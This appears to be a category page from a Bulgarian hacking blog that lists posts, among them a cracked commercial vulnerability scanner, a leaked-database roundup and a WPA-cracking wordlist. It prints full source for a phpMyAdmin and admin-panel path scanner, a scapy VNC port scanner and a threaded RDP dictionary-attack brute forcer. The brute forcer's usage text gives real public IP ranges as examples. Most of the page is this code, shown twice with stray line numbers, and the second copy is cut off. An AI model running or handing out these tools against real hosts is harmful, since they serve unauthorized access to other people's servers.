Category: Сигурност

УРОЦИ / Уроци

26 сеп., 2017

WordPress Vulnerability Scan

Това е демонстрация на инструмента WPSCAN със който може да проверявате дали вашият WordPress сайт е уязвим или не.

Програми

26 сеп., 2017

Acunetix Web Vulnerability Scanner 8 Full + Crack [Tested]

Acunetix Web Vulnerability Scanner е уеб инструмент. Това е приложение, което ще ви помогне по-добре да защитите компютъра си и данните на него. Тази програма...

Сигурност / Скриптове / Уроци

15 сеп., 2017

Darkjumper- Автоматизиран инструмент и урок

Уеб апликациите се голям проблем за сигурността на администраторите също така и за хостинг провайдърите. По какъв начин е проблем за провайдерите? Ако някой от сайтовете...

Интересно / Общо / Сигурност

7 апр., 2017

Изтекли бази данни в интернет!

На скоро докато сърфирах попаднах на сайтове които са потрудили да съберат всички налични база дани споделени в интернет постранството! Което ми стана любопитно...

Сигурност

11 Ное., 2016

WPA WPA2 Word List – 982,963,904 Думи

Компресиран файл на размер: 4.4gb Декомпресиран файл размер: 13gb Помислих че би било добре да споделя хубав лист за тези които гледат да проникнат...

Windows

10 Ное., 2016

[FIX][RDP]Terminal Server has exceeded max number of connections

Днеска по време на Penetration Testing, опитвах се да установя връзка със Remote Desktop сървър и попаднах на една грешка. Използва Kali Linux за...

PHP СКРИПТОВЕ / Скриптове

12 окт., 2016

[PHP]phpMyAdmin Scanner v2

Със този скрипт можете да сканирате за phpMyAdmin директория на даден сайт.

<html>
<title>Php My Admin Finder  Code by MaStErChO version 2</title>
<body>
<form action ="finder.php" method="post">
URL to site: <input type ="text" name="site"/>
<input type = "submit" value="Find" />
</form>
</body>
</html>
//Hack3D Team
// Bulgarian Pentest Team
// mastercho  PhpMyAdmin page Scaner
<?php
$site = $_POST['site'];
 
$list = array(
'/admin/',
'/login/',
'/admin1.php/',
'/admin.php/',
'/admin.html/',
'/admin1.php/',
'/admin1.html/',
'/login.php/',
'/admin/cp.php/',
'/cp.php/',
'/administrator/index.php/',
'/administrator/index.html/',
'/administartor/',
'/admin.login/',
'/administrator/login.php/',
'/administrator/login.html/',
'/phpMyAdmin/',
'/phpmyadmin/',
'/PMA/',
'/pma/',
'/dbadmin/',
'/mysql/',
'/myadmin/',
'/phpmyadmin2/',
'/phpMyAdmin2/',
'/phpMyAdmin-2/',
'/php-my-admin/',
'/phpMyAdmin-2.2.3/',
'/phpMyAdmin-2.2.6/',
'/phpMyAdmin-2.5.1/',
'/phpMyAdmin-2.5.4/',
'/phpMyAdmin-2.5.5-rc1/',
'/phpMyAdmin-2.5.5-rc2/',
'/phpMyAdmin-2.5.5/',
'/phpMyAdmin-2.5.5-pl1/',
'/phpMyAdmin-2.5.6-rc1/',
'/phpMyAdmin-2.5.6-rc2/',
'/phpMyAdmin-2.5.6/',
'/phpMyAdmin-2.5.7/',
'/phpMyAdmin-2.5.7-pl1/',
'/phpMyAdmin-2.6.0-alpha/',
'/phpMyAdmin-2.6.0-alpha2/',
'/phpMyAdmin-2.6.0-beta1/',
'/phpMyAdmin-2.6.0-beta2/',
'/phpMyAdmin-2.6.0-rc1/',
'/phpMyAdmin-2.6.0-rc2/',
'/phpMyAdmin-2.6.0-rc3/',
'/phpMyAdmin-2.6.0/',
'/phpMyAdmin-2.6.0-pl1/',
'/phpMyAdmin-2.6.0-pl2/',
'/phpMyAdmin-2.6.0-pl3/',
'/phpMyAdmin-2.6.1-rc1/',
'/phpMyAdmin-2.6.1-rc2/',
'/phpMyAdmin-2.6.1/',
'/phpMyAdmin-2.6.1-pl1/',
'/phpMyAdmin-2.6.1-pl2/',
'/phpMyAdmin-2.6.1-pl3/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2-beta1/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2/',
'/phpMyAdmin-2.6.2-pl1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-rc1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-pl1/',
'/phpMyAdmin-2.6.4-rc1/',
'/phpMyAdmin-2.6.4-pl1/',
'/phpMyAdmin-2.6.4-pl2/',
'/phpMyAdmin-2.6.4-pl3/',
'/phpMyAdmin-2.6.4-pl4/',
'/phpMyAdmin-2.6.4/',
'/phpMyAdmin-2.7.0-beta1/',
'/phpMyAdmin-2.7.0-rc1/',
'/phpMyAdmin-2.7.0-pl1/',
'/phpMyAdmin-2.7.0-pl2/',
'/phpMyAdmin-2.7.0/',
'/phpMyAdmin-2.8.0-beta1/',
'/phpMyAdmin-2.8.0-rc1/',
'/phpMyAdmin-2.8.0-rc2/',
'/phpMyAdmin-2.8.0/',
'/phpMyAdmin-2.8.0.1/',
'/phpMyAdmin-2.8.0.2/',
'/phpMyAdmin-2.8.0.3/',
'/phpMyAdmin-2.8.0.4/',
'/phpMyAdmin-2.8.1-rc1/',
'/phpMyAdmin-2.8.1/',
'/phpMyAdmin-2.8.2/',
'/sqlmanager/',
'/mysqlmanager/',
'/p/m/a/',
'/PMA2005/',
'/pma2005/',
'/phpmanager/',
'/php-myadmin/',
'/phpmy-admin/',
'/webadmin/',
'/sqlweb/',
'/websql/',
'/webdb/',
'/mysqladmin/',
'/mysql-admin/',
'/mya/',
);
 
if(isset($site)){
 
foreach($list as $path => $test) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $site.$test);
$result = curl_exec($ch);
curl_close($ch);
//print $url;
if (preg_match("/200 OK/", $result)){
echo "<br /> [!] w00t! w00t! Found phpMyAdmin [ $site$test ]";
}
else if (preg_match("/401 Unauthorized/", $result)) {
echo "<br /> [!] w00t! w00t! Found phpMyAdmin [ $site$test ]";
}
else {
echo "<br /> [-] Nothing found on [$site$test]";
}
}
}
 
?>

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

<html>

<title>Php My Admin Finder Code by MaStErChO version 2</title>

<body>

URL to site: <input type ="text" name="site"/>

</form>

</body>

</html>

//Hack3D Team

// Bulgarian Pentest Team

// mastercho PhpMyAdmin page Scaner

<?php

$site = $_POST['site'];

$list = array(

'/admin/',

'/login/',

'/admin1.php/',

'/admin.php/',

'/admin.html/',

'/admin1.php/',

'/admin1.html/',

'/login.php/',

'/admin/cp.php/',

'/cp.php/',

'/administrator/index.php/',

'/administrator/index.html/',

'/administartor/',

'/admin.login/',

'/administrator/login.php/',

'/administrator/login.html/',

'/phpMyAdmin/',

'/phpmyadmin/',

'/PMA/',

'/pma/',

'/dbadmin/',

'/mysql/',

'/myadmin/',

'/phpmyadmin2/',

'/phpMyAdmin2/',

'/phpMyAdmin-2/',

'/php-my-admin/',

'/phpMyAdmin-2.2.3/',

'/phpMyAdmin-2.2.6/',

'/phpMyAdmin-2.5.1/',

'/phpMyAdmin-2.5.4/',

'/phpMyAdmin-2.5.5-rc1/',

'/phpMyAdmin-2.5.5-rc2/',

'/phpMyAdmin-2.5.5/',

'/phpMyAdmin-2.5.5-pl1/',

'/phpMyAdmin-2.5.6-rc1/',

'/phpMyAdmin-2.5.6-rc2/',

'/phpMyAdmin-2.5.6/',

'/phpMyAdmin-2.5.7/',

'/phpMyAdmin-2.5.7-pl1/',

'/phpMyAdmin-2.6.0-alpha/',

'/phpMyAdmin-2.6.0-alpha2/',

'/phpMyAdmin-2.6.0-beta1/',

'/phpMyAdmin-2.6.0-beta2/',

'/phpMyAdmin-2.6.0-rc1/',

'/phpMyAdmin-2.6.0-rc2/',

'/phpMyAdmin-2.6.0-rc3/',

'/phpMyAdmin-2.6.0/',

'/phpMyAdmin-2.6.0-pl1/',

'/phpMyAdmin-2.6.0-pl2/',

'/phpMyAdmin-2.6.0-pl3/',

'/phpMyAdmin-2.6.1-rc1/',

'/phpMyAdmin-2.6.1-rc2/',

'/phpMyAdmin-2.6.1/',

'/phpMyAdmin-2.6.1-pl1/',

'/phpMyAdmin-2.6.1-pl2/',

'/phpMyAdmin-2.6.1-pl3/',

'/phpMyAdmin-2.6.2-rc1/',

'/phpMyAdmin-2.6.2-beta1/',

'/phpMyAdmin-2.6.2-rc1/',

'/phpMyAdmin-2.6.2/',

'/phpMyAdmin-2.6.2-pl1/',

'/phpMyAdmin-2.6.3/',

'/phpMyAdmin-2.6.3-rc1/',

'/phpMyAdmin-2.6.3/',

'/phpMyAdmin-2.6.3-pl1/',

'/phpMyAdmin-2.6.4-rc1/',

'/phpMyAdmin-2.6.4-pl1/',

'/phpMyAdmin-2.6.4-pl2/',

'/phpMyAdmin-2.6.4-pl3/',

'/phpMyAdmin-2.6.4-pl4/',

'/phpMyAdmin-2.6.4/',

'/phpMyAdmin-2.7.0-beta1/',

'/phpMyAdmin-2.7.0-rc1/',

'/phpMyAdmin-2.7.0-pl1/',

'/phpMyAdmin-2.7.0-pl2/',

'/phpMyAdmin-2.7.0/',

'/phpMyAdmin-2.8.0-beta1/',

'/phpMyAdmin-2.8.0-rc1/',

'/phpMyAdmin-2.8.0-rc2/',

'/phpMyAdmin-2.8.0/',

'/phpMyAdmin-2.8.0.1/',

'/phpMyAdmin-2.8.0.2/',

'/phpMyAdmin-2.8.0.3/',

'/phpMyAdmin-2.8.0.4/',

'/phpMyAdmin-2.8.1-rc1/',

'/phpMyAdmin-2.8.1/',

'/phpMyAdmin-2.8.2/',

'/sqlmanager/',

'/mysqlmanager/',

'/p/m/a/',

'/PMA2005/',

'/pma2005/',

'/phpmanager/',

'/php-myadmin/',

'/phpmy-admin/',

'/webadmin/',

'/sqlweb/',

'/websql/',

'/webdb/',

'/mysqladmin/',

'/mysql-admin/',

'/mya/',

);

if(isset($site)){

foreach($list as $path => $test) {

$ch = curl_init();

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_HEADER, 1);

curl_setopt($ch, CURLOPT_URL, $site.$test);

$result = curl_exec($ch);

curl_close($ch);

//print $url;

if (preg_match("/200 OK/", $result)){

echo "<br /> [!] w00t! w00t! Found phpMyAdmin [ $site$test ]";

}

else if (preg_match("/401 Unauthorized/", $result)) {

echo "<br /> [!] w00t! w00t! Found phpMyAdmin [ $site$test ]";

}

else {

echo "<br /> [-] Nothing found on [$site$test]";

}

Линк : https://github.com/mastercho/phpMyAdmin-Scanner-v2

Скриптове

8 мар., 2016

[Python] vnc_scan.py

#!/usr/bin/env python

#Scans a range and prints a output list of "targets" that have the VNC port open

import sys

from scapy import *

conf.verb=0

if len(sys.argv) != 2:

print "Usage: ./vnc_scan.py <target>"

print "Where <target> is a range like 192.168.1.0/24"

sys.exit(1)

target=sys.argv[1]

p=IP(dst=target)/TCP(dport=5900, flags="S") # Making the packet :)

ans,unans=sr(p, timeout=9) # Setting the timeouts :)

for a in ans:

if a[1].flags == 2:

print a[1].src

Скриптове

8 мар., 2016

[Python] RDP Brute

#! /usr/bin/env python
# RDP Dictionary Attack
# 21.05.2012 cmiN
#
# THIS SCRIPT IS INTENDED FOR PERSONAL AND LIMITED PURPOSES ONLY
# I AM NOT RESPONSIBLE FOR ANY LEGAL OR ILLEGAL USE OF THIS PROGRAM
#
# Connect with rdesktop, xfreerdp or something similar using
# servers, users and passwords from files.
# After checking if the port is opened, the wrapper opens a shell console
# executing the client with data from input files. In the meantime
# a local socket is accepting connections from the target and if the link
# is established then the user and password for that server are a match.
#
# You need rdesktop/xfreerdp (sudo apt-get/yum/equo install rdesktop/freerdp).
# On gentoo based systems use emerge to find and install the newest packages.
# Contact: cmin764@yahoo/gmail.com

from sys import argv, platform
from threading import Thread, active_count, Lock
from subprocess import Popen
from socket import *

# defaults
THRD = 4 # how many threads for crack phase
TOUT = 6.0 # timeout in seconds
# get global host ip
try:
    sock = socket(AF_INET, SOCK_STREAM)
    sock.connect(("www.google.com", 80)) # assuming google works
except error as excp: # error from socket (timed out or invalid server)
    print "Check your internet connection: %s." % excp
    exit()
else:
    HOST = sock.getsockname()[0]
finally:
    sock.close()
    del sock
PORT = 51337 # used for local listening
# attack modes
RDP1 = ["rdesktop", "-u", "{user}", "-p", "{password}", "-s", "telnet {host} {port}",
        "-g", "1x1", "-a", "8", "-x", "m", "-z", "-m", "{server}"]
RDP2 = ["xfreerdp", "-u", "{user}", "-p", "{password}", "-s", "telnet {host} {port}",
        "-g", "1x1", "-a", "8", "-x", "m", "-z", "--no-motion", "{server}"]
VERB = False # verbose
METH = "r" # RDP1
USER = ["Administrator"]
SAFE = True
SWTC = True
LIMT = None # attacks (test only, None -> unlimited)

class Engine:
    """Main class used to find and crack servers with desired options.
    For more info see usage from the bottom of the script.
    It executes commands through subprocess and waits for replies within timeout.
    """

def __init__(self, threads, timeout, host, port, rdp1, rdp2, verbose, method, usr, safe, switch):
        """Copy global options and prepare the core."""
        self.cli = True # activate print/stdout (set to False if a GUI is used)
        self.threads = threads
        self.timeout = timeout
        self.host = host
        self.port = port
        self.rdp1 = rdp1
        self.rdp2 = rdp2
        self.verbose = verbose
        self.sockets = dict() # D[x] = True if x is available otherwise False
        self.pos = list() # list with indexes (user, password, server, telnet)
        self.usr = usr
        self.pwd = None
        self.srv = None
        # set the command used for scanning
        if method == "x":
            self.command = self.rdp2
        else:
            self.command = self.rdp1
        # default: don't save
        self.working = None
        self.cracked = None
        self.good = list() # rdp servers
        self.delete = set() # dispose of cracked servers
        self.lock = Lock() # global printing thread synchronization
        self.sock_mutex = Lock() # for localhost socket use
        if "linux" in platform:
            self.null = open("/dev/null", "w")
        else:
            self.null = open("NUL", "w")
        self.safe = safe
        self.switch = switch

def __del__(self):
        """Destructor."""
        if hasattr(self.srv, "close"):
            self.srv.close()
        if hasattr(self.usr, "close"):
            self.usr.close()
        if self.pwd:
            self.pwd.close()
        if self.working:
            self.working.close()
        if self.cracked:
            self.cracked.close()
        for sock in self.sockets:
            sock.shutdown(SHUT_RDWR)
            sock.close()

def generator(self, src, dest):
        """Just like grandpa's old mileage meter :]."""
        temp = "%d.%d.%d.%d"
        byte = 256
        yield temp % tuple(src) # yield -> the beauty of python
        while (src != dest):    # like return but continue
            src[3] += 1
            if src[3] == byte:
                src[3] = 0
                src[2] += 1
                if src[2] == byte:
                    src[2] = 0
                    src[1] += 1
                    if src[1] == byte:
                        src[1] = 0
                        src[0] += 1
            yield temp % tuple(src)

def set_threads(self, threads):
        self.threads = threads

def set_safe(self, safe):
        self.safe = safe

def set_switch(self, switch):
        self.switch = switch

def set_timeout(self, timeout):
        self.timeout = timeout

def set_verbose(self, verbose):
        self.verbose = verbose

def set_method(self, method):
        if method == "x":
            self.command = self.rdp2
        else:
            self.command = self.rdp1

def set_usr(self, usr):
        """If this is called, then the users are taken from a file."""
        self.usr = open(usr, "r") # do not use the generic one

def set_pwd(self, pwd):
        """The file with passwords is mandatory."""
        self.pwd = open(pwd, "r")

def set_srv(self, srv):
        """Make a file object or range generator from argument."""
        if srv.find("-") == -1: # not found -> not range
            self.srv = open(srv, "r")
        else:
            chunks = srv.split("-")
            src, dest = chunks[0].split("."), chunks[1].split(".")
            for i in xrange(4):
                src[i] = int(src[i])
                dest[i] = int(dest[i])
            self.srv = self.generator(src, dest)

def set_working(self, working):
        """Save progress in scan phase."""
        self.working = open(working, "a") # safe append

def set_cracked(self, cracked):
        """Save progress in crack phase."""
        self.cracked = open(cracked, "a")

def scan_server(self, server):
        """Check if the rdp port is opened on the specified server."""
        try:
            # create the socket and connect
            sock = socket(AF_INET, SOCK_STREAM)
            sock.connect((server, 3389))
        except error:
            # timed out in most cases
            if self.verbose:
                self.lock.acquire()
                if self.cli:
                    print "[-] %s [NO]" % server # only with -v
                self.lock.release()
        else:
            # good news everyone
            self.lock.acquire()
            if self.cli:
                print "[+] %s [OK]" % server
            self.good.append(server)
            if self.working:
                self.working.write(server + "\n")
                self.working.flush()
            self.lock.release()
        finally:
            sock.close()

def scan(self):
        """Just like a port scanner for 3389."""
        setdefaulttimeout(self.timeout / 10.0) # 10%
        for server in self.srv:
            while active_count() > self.threads * 16:
                pass # do not exceed number of threads
            if self.switch: # scan them
                # now call the method in a separate thread
                Thread(target=self.scan_server, args=[server.strip()]).start()
            else: # or skip the scan
                self.good.append(server.strip())
        while active_count() > 1:
            pass # join all

def acquire_sock(self):
        for sock, state in self.sockets.iteritems():
            if state: # available
                self.sockets[sock] = False # use it
                return sock

def release_sock(self, sock):
        self.sockets[sock] = True

def crack_server(self, command):
        try:
            # get a server
            self.sock_mutex.acquire()
            sock = self.acquire_sock()
            self.sock_mutex.release()
            command[self.pos[3]] = command[self.pos[3]].format(port=sock.getsockname()[1])
            child = Popen(command, stdout=self.null, stderr=self.null) # no wait
            sock.accept() # here is the big overhead
        except error as excp:
            # timed out
            if self.verbose:
                self.lock.acquire()
                if self.cli:
                    print "[-] %s %s %s [NO]" % (command[self.pos[2]], command[self.pos[0]],
                                                  command[self.pos[1]])
                self.lock.release()
        else:
            # good news again
            show = "%s %s %s" % (command[self.pos[2]], command[self.pos[0]], command[self.pos[1]])
            self.delete.add(command[self.pos[2]]) # cracked! no need to process again
            self.lock.acquire()
            if self.cli:
                print "[+] " + show + " [OK]"
            if self.cracked:
                self.cracked.write(show + "\n")
                self.cracked.flush()
            self.lock.release()
        finally:
            child.kill()
            # do not close it, instead release it for further use
            self.release_sock(sock) # O(1) and can't affect the same socket

def crack(self):
        """For each user take each password and test them with each working server."""
        goodLen = len(self.good)
        if goodLen == 0:
            if self.cli:
                print "[!] No servers to crack."
            return
        if self.safe: # avoid deadlocks or strange behavior
            self.set_threads(min(self.threads, goodLen))
        users = [line.strip() for line in self.usr]
        passwords = [line.strip() for line in self.pwd]
        if self.cli:
            print "[i] Cracking %d hosts in %fs." % (goodLen, float(len(users)) * len(passwords) *
                                                     goodLen * self.timeout / self.threads)
        setdefaulttimeout(self.timeout) # now use the real timeout
        # prepare the sockets
        for port in xrange(self.threads):
            sock = socket(AF_INET, SOCK_STREAM)
            sock.settimeout(self.timeout)
            sock.bind((self.host, self.port + port))
            sock.listen(1)
            self.sockets[sock] = True
        # init command template
        command = self.command
        shellIndex = command.index("telnet {host} {port}")
        command[shellIndex] = command[shellIndex].format(host=self.host, port="{port}")
        self.pos = [command.index("{user}"), command.index("{password}"),
                    command.index("{server}"), shellIndex]
        attacks = 0
        for user in users:
            command[self.pos[0]] = user
            for password in passwords:
                command[self.pos[1]] = password
                for server in self.good:
                    command[self.pos[2]] = server
                    while active_count() > self.threads:
                        pass # do not exceed number of threads
                    attacks += 1
                    if LIMT and attacks > LIMT:
                        if self.cli:
                            print "[!] Limit reached, buy the script."
                        return
                    # now call the method in a separate thread
                    Thread(target=self.crack_server, args=[command[:]]).start()
                for server in self.delete: # N^2 can be reduced to NlogN with set
                    self.good.remove(server) # and also to N with index memorization
                self.delete.clear()
        while active_count() > 1:
            pass # join all

def parse():
    at = 1
    params = list()
    while at < argc:
        if argv[at] in ("-h", "--help"):
            print usage
            exit() # do not start the process
        elif argv[at] in ("-v", "--verbose"):
            app.set_verbose(True)
        elif argv[at] in ("-t", "--threads"):
            at += 1
            app.set_threads(int(argv[at]))
        elif argv[at] in ("-T", "--timeout"):
            at += 1
            app.set_timeout(float(argv[at]))
        elif argv[at] in ("-m", "--method"):
            at += 1
            app.set_method(argv[at])
        elif argv[at] in ("-w", "--working"):
            at += 1
            app.set_working(argv[at])
        elif argv[at] in ("-c", "--cracked"):
            at += 1
            app.set_cracked(argv[at])
        elif argv[at] in ("-s", "--safe-off"):
            app.set_safe(False)
        elif argv[at] in ("-n", "--no-scan"):
            app.set_switch(False)
        else:
            if argv[at][0] == "-":
                raise Exception("Invalid option")
            params.append(argv[at])
        at += 1
    pLen = len(params)
    if pLen not in (2, 3):
        raise Exception("Invalid number of parameters")
    app.set_srv(params[-1])
    app.set_pwd(params[-2])
    if pLen == 3:
        app.set_usr(params[-3]) # same index as 0

def main():
    try:
        if argc == 1:
            # show a message or start the GUI which is missing :)
            print "You should run: %s --help" % argv[0]
            exit()
        # or parse the arguments
        parse()
        # and start the scanner
        print "[i] Scan phase started."
        app.scan() # filter the input for working rdp servers
        print "[i] Crack phase started."
        app.crack() # crack them
    except Exception as excp:
        print "[x] Error: %s." % excp
    except KeyboardInterrupt:
        print "[!] Stopped."
    else:
        print "[i] Finished."

if __name__ == "__main__":
    argc = len(argv)
    usage = """
Usage: {0} [options] [usr] pwd srv

Options:
    -t, --threads <number>     number of threads (parallel connections)
    -s, --safe-off             by default the number of threads is reduced
                               to the number of working servers if it's greater
                               use this option to keep the number of threads
    -T, --timeout <seconds>    waiting response time for each connection
    -m, --method <r/x>         use [r]desktop or [x]freerdp
    -w, --working <file>       file used to store servers with 3389 opened
    -c, --cracked <file>       file used to store cracked servers
    -n, --no-scan              skip scan phase asumming all servers are working rdps
    -v, --verbose              show extra information (default off)
    -h, --help                 show this help

Parameters:
    usr                        users file (default users: {1})
    pwd                        passwords file
    srv                        servers file or range (abc.def.ghi.jkl-mno.pqr.stu.vwx)

Examples:
    {0} -c cracked.txt passwords.txt 68.195.205.60-68.195.211.60
    {0} -w good.txt --timeout 2 -s pass.txt 91.202.91.119-91.202.94.15
    {0} -t 256 -T 5 -v -c cracked.txt -n users.txt pass.txt good.txt

Users, passwords and working servers are loaded into memory.
Be aware to not open a file for both read and write. More exactly do not use
the same file name with `-w`/`-c` and `srv`.

THIS SCRIPT IS INTENDED FOR PERSONAL AND LIMITED PURPOSES ONLY
I AM NOT RESPONSIBLE FOR ANY LEGAL OR ILLEGAL USE OF THIS PROGRAM

Send bugs to cmin764@yahoo/gmail.com.
""".format(argv[0], USER)
    app = Engine(THRD, TOUT, HOST, PORT, RDP1, RDP2, VERB, METH, USER, SAFE, SWTC)
    main()
    del app

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

327

328

329

330

331

332

333

334

335

336

337

338

339

340

341

342

343

344

345

346

347

348

349

350

351

352

353

354

355

356

357

358

359

360

361

362

363

364

365

366

367

368

369

370

371

372

373

374

375

376

377

378

379

380

381

382

383

384

385

386

387

388

389

390

391

392

393

394

395

396

397

398

399

400

401

402

403

404

405

406

407

408

409

410

411

412

413

414

415

416

417

418

419

420

421

422

423

424

425

426

427

428

429

430

431

432

433

434

435

436

437

438

439

440

441

442

443

444

445

446

447

448

449

450

451

#! /usr/bin/env python

# RDP Dictionary Attack

# 21.05.2012 cmiN

# THIS SCRIPT IS INTENDED FOR PERSONAL AND LIMITED PURPOSES ONLY

# I AM NOT RESPONSIBLE FOR ANY LEGAL OR ILLEGAL USE OF THIS PROGRAM

# Connect with rdesktop, xfreerdp or something similar using

# servers, users and passwords from files.

# After checking if the port is opened, the wrapper opens a shell console

# executing the client with data from input files. In the meantime

# a local socket is accepting connections from the target and if the link

# is established then the user and password for that server are a match.

# You need rdesktop/xfreerdp (sudo apt-get/yum/equo install rdesktop/freerdp).

# On gentoo based systems use emerge to find and install the newest packages.

# Contact: cmin764@yahoo/gmail.com

from sys import argv, platform

from threading import Thread, active_count, Lock

from subprocess import Popen

from socket import *

# defaults

THRD = 4 # how many threads for crack phase

TOUT = 6.0 # timeout in seconds

# get global host ip

try:

sock = socket(AF_INET, SOCK_STREAM)

sock.connect(("www.google.com", 80)) # assuming google works

except error as excp: # error from socket (timed out or invalid server)

print "Check your internet connection: %s." % excp

exit()

else:

HOST = sock.getsockname()[0]

finally:

sock.close()

del sock

PORT = 51337 # used for local listening

# attack modes

RDP1 = ["rdesktop", "-u", "{user}", "-p", "{password}", "-s", "telnet {host} {port}",

"-g", "1x1", "-a", "8", "-x", "m", "-z", "-m", "{server}"]

RDP2 = ["xfreerdp", "-u", "{user}", "-p", "{password}", "-s", "telnet {host} {port}",

"-g", "1x1", "-a", "8", "-x", "m", "-z", "--no-motion", "{server}"]

VERB = False # verbose

METH = "r" # RDP1

USER = ["Administrator"]

SAFE = True

SWTC = True

LIMT = None # attacks (test only, None -> unlimited)

class Engine:

"""Main class used to find and crack servers with desired options.

For more info see usage from the bottom of the script.

It executes commands through subprocess and waits for replies within timeout.

"""

def __init__(self, threads, timeout, host, port, rdp1, rdp2, verbose, method, usr, safe, switch):

"""Copy global options and prepare the core."""

self.cli = True # activate print/stdout (set to False if a GUI is used)

self.threads = threads

self.timeout = timeout

self.host = host

self.port = port

self.rdp1 = rdp1

self.rdp2 = rdp2

self.verbose = verbose

self.sockets = dict() # D[x] = True if x is available otherwise False

self.pos = list() # list with indexes (user, password, server, telnet)

self.usr = usr

self.pwd = None

self.srv = None

# set the command used for scanning

if method == "x":

self.command = self.rdp2

else:

self.command = self.rdp1

# default: don't save

self.working = None

self.cracked = None

self.good = list() # rdp servers

self.delete = set() # dispose of cracked servers

self.lock = Lock() # global printing thread synchronization

self.sock_mutex = Lock() # for localhost socket use

if "linux" in platform:

self.null = open("/dev/null", "w")

else:

self.null = open("NUL", "w")

self.safe = safe

self.switch = switch

def __del__(self):

"""Destructor."""

if hasattr(self.srv, "close"):

self.srv.close()

if hasattr(self.usr, "close"):

self.usr.close()

if self.pwd:

self.pwd.close()

if self.working:

self.working.close()

if self.cracked:

self.cracked.close()

for sock in self.sockets:

sock.shutdown(SHUT_RDWR)

sock.close()

def generator(self, src, dest):

"""Just like grandpa's old mileage meter :]."""

temp = "%d.%d.%d.%d"

byte = 256

yield temp % tuple(src) # yield -> the beauty of python

while (src != dest): # like return but continue

src[3] += 1

if src[3] == byte:

src[3] = 0

src[2] += 1

if src[2] == byte:

src[2] = 0

src[1] += 1

if src[1] == byte:

src[1] = 0

src[0] += 1

yield temp % tuple(src)

def set_threads(self, threads):

self.threads = threads

def set_safe(self, safe):

self.safe = safe

def set_switch(self, switch):

self.switch = switch

def set_timeout(self, timeout):

self.timeout = timeout

def set_verbose(self, verbose):

self.verbose = verbose

def set_method(self, method):

if method == "x":

self.command = self.rdp2

else:

self.command = self.rdp1

def set_usr(self, usr):

"""If this is called, then the users are taken from a file."""

self.usr = open(usr, "r") # do not use the generic one

def set_pwd(self, pwd):

"""The file with passwords is mandatory."""

self.pwd = open(pwd, "r")

def set_srv(self, srv):

"""Make a file object or range generator from argument."""

if srv.find("-") == -1: # not found -> not range

self.srv = open(srv, "r")

else:

chunks = srv.split("-")

src, dest = chunks[0].split("."), chunks[1].split(".")

for i in xrange(4):

src[i] = int(src[i])

dest[i] = int(dest[i])

self.srv = self.generator(src, dest)

def set_working(self, working):

"""Save progress in scan phase."""

self.working = open(working, "a") # safe append

def set_cracked(self, cracked):

"""Save progress in crack phase."""

self.cracked = open(cracked, "a")

def scan_server(self, server):

"""Check if the rdp port is opened on the specified server."""

try:

# create the socket and connect

sock = socket(AF_INET, SOCK_STREAM)

sock.connect((server, 3389))

except error:

# timed out in most cases

if self.verbose:

self.lock.acquire()

if self.cli:

print "[-] %s [NO]" % server # only with -v

self.lock.release()

else:

# good news everyone

self.lock.acquire()

if self.cli:

print "[+] %s [OK]" % server

self.good.append(server)

if self.working:

self.working.write(server + "\n")

self.working.flush()

self.lock.release()

finally:

sock.close()

def scan(self):

"""Just like a port scanner for 3389."""

setdefaulttimeout(self.timeout / 10.0) # 10%

for server in self.srv:

while active_count() > self.threads * 16:

pass # do not exceed number of threads

if self.switch: # scan them

# now call the method in a separate thread

Thread(target=self.scan_server, args=[server.strip()]).start()

else: # or skip the scan

self.good.append(server.strip())

while active_count() > 1:

pass # join all

def acquire_sock(self):

for sock, state in self.sockets.iteritems():

if state: # available

self.sockets[sock] = False # use it

return sock

def release_sock(self, sock):

self.sockets[sock] = True

def crack_server(self, command):

try:

# get a server

self.sock_mutex.acquire()

sock = self.acquire_sock()

self.sock_mutex.release()

command[self.pos[3]] = command[self.pos[3]].format(port=sock.getsockname()[1])

child = Popen(command, stdout=self.null, stderr=self.null) # no wait

sock.accept() # here is the big overhead

except error as excp:

# timed out

if self.verbose:

self.lock.acquire()

if self.cli:

print "[-] %s %s %s [NO]" % (command[self.pos[2]], command[self.pos[0]],

command[self.pos[1]])

self.lock.release()

else:

# good news again

show = "%s %s %s" % (command[self.pos[2]], command[self.pos[0]], command[self.pos[1]])

self.delete.add(command[self.pos[2]]) # cracked! no need to process again

self.lock.acquire()

if self.cli:

print "[+] " + show + " [OK]"

if self.cracked:

self.cracked.write(show + "\n")

self.cracked.flush()

self.lock.release()

finally:

child.kill()

# do not close it, instead release it for further use

self.release_sock(sock) # O(1) and can't affect the same socket

def crack(self):

"""For each user take each password and test them with each working server."""

goodLen = len(self.good)

if goodLen == 0:

if self.cli:

print "[!] No servers to crack."

return

if self.safe: # avoid deadlocks or strange behavior

self.set_threads(min(self.threads, goodLen))

users = [line.strip() for line in self.usr]

passwords = [line.strip() for line in self.pwd]

if self.cli:

print "[i] Cracking %d hosts in %fs." % (goodLen, float(len(users)) * len(passwords) *

goodLen * self.timeout / self.threads)

setdefaulttimeout(self.timeout) # now use the real timeout

# prepare the sockets

